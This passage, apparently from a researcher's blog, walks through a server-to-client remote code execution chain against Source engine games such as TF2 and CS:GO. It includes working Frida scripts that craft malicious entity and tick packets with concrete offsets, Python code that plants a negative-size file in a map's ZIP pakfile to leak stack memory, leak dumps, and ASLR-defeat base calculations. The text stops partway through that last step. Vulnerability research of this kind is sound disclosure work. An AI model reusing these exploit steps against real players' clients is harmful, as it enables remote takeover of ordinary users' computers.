In CS:GO, the classic method of exploiting these types of bugs is to exploit some buffer overflow, build a ROP chain using the module xinput.dll, which has ASLR marked as disabled, and execute shellcode with that alone. On Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find these on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can be relocated to other addresses just fine, and can sometimes be found at different addresses if another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically, due to the way xinput.dll asks to be loaded, the system chooses not to randomize its base address, which inherently defeats ASLR: you generally always know where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem too concerned by this, as it’s been exploited over and over again over the years. Surprisingly, though, in TF2 there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice, I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

  • Client connects to server
  • Server exploits stack-based buffer overflow in the client
  • Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
  • Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
  • Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

One option for getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

  • Arbitrary relative pointer writes to pointers in global queryable objects
  • Heap overflows against a queryable object to cause controllable pointer writes
  • Use-after-free with a queryable object

Heap exploits are cool to write, but their stability can often be difficult to achieve due to the vast number of heap allocations happening at any given time. Carving out areas of heap memory for your exploit therefore requires careful consideration of specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than with the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The value sent back is either the ConVar’s integer value or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

  • The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
  • The exploit must produce its own pointer leak, or chain another bug to infoleak
  • The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
  • The exploit must have a ~100% stability rate
  • The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were ruled out because they were trivial stack-based buffer overflows, or were present in only one game but not the others.

Here’s what I eventually settled on for my chain:

  • Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
  • Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    // ...
}

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check that this value is sane, and crash the game if it weren’t. But this is not what happens in practice. In release builds of the game, Assert statements are not compiled in at all. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure, entitylist, inside of client.dll. This object holds the client’s central store of all data related to game entities. Since m_EntityCacheInfo is at a static global offset, we can easily calculate the proper value of entnum for our exploit: locate the offset of m_EntityCacheInfo in any given version of client.dll and work out the entnum that produces our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

All together, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable, as long as that pointer is stored at an address lying on the 8-byte stride of m_EntityCacheInfo (sizeof(EntityCacheInfo_t) == 8). This matters later when chaining the exploit.
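To make the primitive concrete, here is a small Python model of the indexing in GetClientNetworkable. The slot address is the array start plus entnum × 8, computed with 32-bit wraparound, so a negative or huge entnum reaches memory before or after the array. The base address and the `cache_offset` parameter (the offset of m_EntityCacheInfo inside entitylist) are hypothetical values. The real ones come from a specific client.dll build.

```python
SLOT_SIZE = 8          # sizeof(EntityCacheInfo_t) on 32-bit builds
MASK32 = 0xFFFFFFFF    # model 32-bit pointer arithmetic


def slot_address(entitylist: int, cache_offset: int, entnum: int) -> int:
    """Address that m_EntityCacheInfo[entnum].m_pNetworkable is read from."""
    return (entitylist + cache_offset + entnum * SLOT_SIZE) & MASK32


# Hypothetical numbers, only to show the arithmetic.
base = 0x10C58000
print(hex(slot_address(base, 0x28, 5)))           # 0x10c58050
print(hex(slot_address(base, 0x28, -1)))          # 0x10c58020, just before the array
print(hex(slot_address(base, 0x28, 0xFFFFFFFF)))  # same slot: the value wraps like -1
```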

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:


This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:


Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const char *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]
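A quick way to double-check the offsets listed above is to model them with ctypes, using 4-byte integers in place of 32-bit pointers. This only mirrors the fields exactly as listed and says nothing else about the real class. It does confirm the padding after the one-byte m_bRegistered and the 0x1C offset of m_pszString.

```python
import ctypes


# 32-bit model of the fields listed above: pointers are modeled as 4-byte integers.
class ConVarLayout(ctypes.Structure):
    _fields_ = [
        ("m_pNext", ctypes.c_uint32),
        ("m_bRegistered", ctypes.c_bool),    # 1 byte, padded up to the next 4-byte field
        ("m_pszName", ctypes.c_uint32),
        ("m_pszHelpString", ctypes.c_uint32),
        ("m_nFlags", ctypes.c_int32),
        ("m_pParent", ctypes.c_uint32),
        ("m_pszDefaultValue", ctypes.c_uint32),
        ("m_pszString", ctypes.c_uint32),
    ]


for name, _ in ConVarLayout._fields_:
    print(f"{name:<18} 0x{getattr(ConVarLayout, name).offset:02X}")
```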

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on it. When the bug calls our function, it will believe that &m_pszString is the location of the object’s pointer. The string data m_pszString points to is therefore treated as the object, and its first DWORD as the vtable pointer. In other words, the engine will believe that any value inside of m_pszString for the ConVar is part of the object’s structure. Then, it will call the function pointer at *((*m_pszString)+0x18), where *m_pszString is the first DWORD of the string (vtable index 6 × 4 bytes = 0x18). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability require that this pointer be aligned to an 8 byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated, so that m_pszString is aligned correctly for GetClientNetworkable to return it.

This can be seen in the disassembly of GetClientNetworkable in x64dbg:


In the above, the pointer we can return is controlled as such:

ecx+eax*8+28, where ecx is entitylist and eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:


This means that, to calculate the address of m_pszString, we add 0x1C to get 0x10C6B788 + 0x1C = 0x10C6B7A4. In this build, entitylist is at an offset aligned to 4 (0xC580B4). So, now we can check whether this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist itself sits on a 0x04 boundary (0xC580B4 % 8 == 4). The distance from entitylist to m_pszString is therefore a multiple of 0x08, so this candidate aligns successfully!
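Running the same arithmetic in reverse gives the entnum for a chosen target. It also shows why only each address's residue modulo 8 matters. `entnum_for` and its `cache_offset` parameter (the offset of m_EntityCacheInfo inside entitylist) are hypothetical names for this sketch. The concrete value for a given client.dll has to come from its disassembly.

```python
SLOT_SIZE = 8  # sizeof(EntityCacheInfo_t)


def entnum_for(entitylist: int, cache_offset: int, target: int) -> int:
    """Return the entnum whose slot address equals target, or raise if misaligned."""
    delta = target - (entitylist + cache_offset)
    if delta % SLOT_SIZE != 0:
        raise ValueError(f"target is {delta % SLOT_SIZE} bytes off the 8-byte stride")
    return delta // SLOT_SIZE  # negative results go on the wire as 32-bit two's complement


# The alignment argument above: both addresses are 4 (mod 8), so their distance is 0 (mod 8).
print(0x10C6B7A4 % 8, 0xC580B4 % 8)   # 4 4

# Hypothetical layout, just to exercise the function.
print(entnum_for(0x1000, 0x28, 0x1050))                     # 5
print(hex(entnum_for(0x1000, 0x28, 0x1020) & 0xFFFFFFFF))   # 0xffffffff (i.e. -1)
```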

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable
  • The code offsets the vtable to index 6 and calls the function pointer stored there. We need to make sure the vtable points to a place we control; otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled directly by the contents of the NET_Tick packet. This means we can assign it an arbitrary 32-bit value. It just so happens that this value is stored in a global as well! After some scripting in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:


The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?

    // Baseline?

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}
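The packet above is a sequence of fixed-width bit fields. To illustrate roughly how such fields pack, here is a small LSB-first bit writer in Python. It assumes each value is written least-significant bit first into a little-endian stream, which is how I understand Source's bitbuf to behave. `BitWriter` is a hypothetical stand-in for the bf_write bindings used above, not their implementation.

```python
class BitWriter:
    """Minimal LSB-first bit packer (a hypothetical stand-in for bf_write)."""

    def __init__(self) -> None:
        self.acc = 0     # all bits written so far; bit 0 is the first bit written
        self.nbits = 0

    def write_ubit_long(self, value: int, nbits: int) -> None:
        if not 0 <= value < (1 << nbits):
            raise ValueError(f"{value:#x} does not fit in {nbits} bits")
        self.acc |= value << self.nbits   # append above the bits already written
        self.nbits += nbits

    def to_bytes(self) -> bytes:
        return self.acc.to_bytes((self.nbits + 7) // 8, "little")


w = BitWriter()
w.write_ubit_long(1, 1)          # a single flag bit
w.write_ubit_long(0x26DA, 32)    # the entnum used later in the exploit, 32 bits wide
print(w.nbits, w.to_bytes().hex())  # 33 b54d000000
```

Because fields are not byte-aligned, a single 1-bit flag shifts every later field, which is one reason the helper functions above write each field explicitly.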

Now we’ve got the following modified chain:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
  • The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.
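To sanity-check the three dereferences in this chain, here is a tiny Python model of 32-bit memory as a dictionary of DWORDs. Apart from &m_pszString (0x10C6B7A4, from the build discussed above), every address is a hypothetical placeholder. The other values taken from this post are the vtable index 6 (call dword ptr [eax+24]) and the 0x41414141 test value written through NET_Tick.

```python
VTABLE_INDEX = 6   # call dword ptr [eax+24] -> 24 / 4 = 6
PTR_SIZE = 4

M_PSZSTRING_FIELD = 0x10C6B7A4   # &sv_mumble_positionalaudio->m_pszString (build above)
STRING_BUFFER = 0x05B92E30       # hypothetical: where the replicated string data lives
TICKCOUNT = 0x7AB00000           # hypothetical: &tickcount inside engine.dll

memory = {
    M_PSZSTRING_FIELD: STRING_BUFFER,                    # the ConVar's m_pszString field
    STRING_BUFFER: TICKCOUNT - VTABLE_INDEX * PTR_SIZE,  # first DWORD of string = fake vtable
    TICKCOUNT: 0x41414141,                               # value set via NET_Tick
}


def resolve_call_target(slot_addr: int) -> int:
    p_ent = memory[slot_addr]                         # GetClientNetworkable's return value
    vtable = memory[p_ent]                            # *pEnt: the fake vtable pointer
    return memory[vtable + VTABLE_INDEX * PTR_SIZE]   # vtable[6]: the called "function"


print(hex(resolve_call_target(M_PSZSTRING_FIELD)))  # 0x41414141
```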

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA) 

0x26DA is the entnum value needed in this build to cause the out-of-bounds read and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:


As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

  • Servers can cause the client to upload arbitrary files with certain file extensions
  • Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
  • When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:


Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.
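The core of the trick is a single 32-bit field in the ZIP structure. The sketch below is not the author's BSP script. It builds a plain ZIP with Python's zipfile module and rewrites the uncompressed-size field of one central-directory entry, assuming that record is what the engine's zipFileHeader refers to. Embedding the result into a map's pakfile is left out.

```python
import io
import struct
import zipfile


def build_zip(name: str, data: bytes) -> bytearray:
    """Create an uncompressed single-file ZIP in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, data)
    return bytearray(buf.getvalue())


def patch_uncompressed_size(archive: bytearray, name: str, new_size: int) -> int:
    """Overwrite the central-directory 'uncompressed size' of `name`; return the entry offset."""
    eocd = archive.rfind(b"PK\x05\x06")                      # end of central directory record
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    (total,) = struct.unpack_from("<H", archive, eocd + 10)  # total number of entries
    (pos,) = struct.unpack_from("<I", archive, eocd + 16)    # start of the central directory
    for _ in range(total):
        if archive[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError("corrupt central directory")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", archive, pos + 28)
        entry_name = archive[pos + 46:pos + 46 + name_len].decode("utf-8")
        if entry_name == name:
            # Offset 24 holds the uncompressed size: unsigned on disk, an int once loaded
            struct.pack_into("<I", archive, pos + 24, new_size & 0xFFFFFFFF)
            return pos
        pos += 46 + name_len + extra_len + comment_len
    raise KeyError(name)


zip_bytes = build_zip("test.txt", b"hello")
entry = patch_uncompressed_size(zip_bytes, "test.txt", -1)
print(struct.unpack_from("<i", zip_bytes, entry + 24)[0])  # -1
```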

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the check for whether a file is too large is a signed comparison. What happens when totalBytes is negative? Any negative value is smaller than the limit, so it passes the length check entirely.

If we are able to hack a file into the ZIP structure with a negative length, the engine will happily upload it to the server.
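The bypass hinges on the same 32 bits being read as signed in one place and as unsigned in another. Below is a small Python model of the check. A hypothetical 16 MB value stands in for net_maxfilesize.

```python
import struct

MB = 1024 * 1024


def as_int32(raw: int) -> int:
    """Reinterpret an unsigned 32-bit value the way `int totalBytes` sees it."""
    return struct.unpack("<i", struct.pack("<I", raw & 0xFFFFFFFF))[0]


def passes_size_check(raw_size: int, max_mb: int) -> bool:
    """Mirror of: if (totalBytes >= net_maxfilesize * 1024 * 1024) reject."""
    total_bytes = as_int32(raw_size)
    return not (total_bytes >= max_mb * MB)


print(passes_size_check(200 * MB, 16))    # False: an honest large file is rejected
print(passes_size_check(0xFFFFFFFF, 16))  # True: reads as -1 and slips past the check
print(0xFFFFFFFF // 0x100)                # 16777215 full 0x100-byte chunks if read as unsigned
```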

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read the contents of the file in 0x100-sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading the data out to a temporary buffer on the stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer), so the networking code will indefinitely send chunks to the server, each time allocating 0x100 bytes of stack space and calling ->Read(). But when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing any data to the stack, as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue to send fragments indefinitely, as the “file size” is too large to ever be sent successfully.
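Here is a simplified Python model of that loop. It assumes a single 0x100-byte buffer that is reused for every fragment and never cleared, plus a read whose return value is ignored. The `stale` bytes are a stand-in for whatever earlier calls left on the stack. In the real engine those bytes change as other code reuses the same stack region, which is what makes the leak useful.

```python
import io

CHUNK = 0x100


def leaky_fragments(f: io.BufferedIOBase, claimed_size: int, stale: bytes, max_chunks: int):
    """Yield the bytes each fragment would carry, ignoring how much was actually read."""
    tmpbuf = bytearray(stale[:CHUNK].ljust(CHUNK, b"\0"))  # pre-existing "stack" contents
    sent = 0
    for _ in range(max_chunks):
        if sent >= claimed_size:
            break
        f.readinto(tmpbuf)     # returns 0 at EOF; the result is ignored, as in the C++ code
        yield bytes(tmpbuf)    # the whole buffer is sent regardless
        sent += CHUNK


stale = bytes(range(256))                  # stand-in for old stack data
pak_file = io.BytesIO(b"PK\x05\x06")       # only 4 real bytes left to read
frags = list(leaky_fragments(pak_file, 0xFFFFFFFF, stale, max_chunks=3))
print(frags[0][:4], frags[0][4:8].hex())   # b'PK\x05\x06' 04050607
```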

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:


Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:


This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:


Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{0....p.h@...
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

  • 97 27 b3 7b
  • 0a a4 bc 7b
  • 05 b9 00 7c
  • 05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.
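A simple version of that heuristic splits a fragment into little-endian DWORDs. It then keeps the ones whose top byte falls where module pointers showed up in this dump (0x7B or 0x7C). That range is specific to this capture and is an assumption, not a general rule. The example uses the last row of the dump above.

```python
import struct
from typing import List


def dwords(blob: bytes) -> List[int]:
    """Split a buffer into little-endian 32-bit values."""
    count = len(blob) // 4
    return list(struct.unpack(f"<{count}I", blob[:count * 4]))


def pointer_candidates(blob: bytes, high_bytes=(0x7B, 0x7C)) -> List[int]:
    """Keep DWORDs whose most significant byte looks like a module address."""
    return [v for v in dwords(blob) if (v >> 24) in high_bytes]


row_f0 = bytes.fromhex("30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b")
print([hex(v) for v in pointer_candidates(row_f0)])  # ['0x7bb327cb', '0x7bb32797']
```

Tracking these candidates across many fragments, as described above, separates stable pointer slots from noise.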

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values (at 0xE4) had a lower WORD that made sense, so it was easily selectable from the list of DWORDs. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it the label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
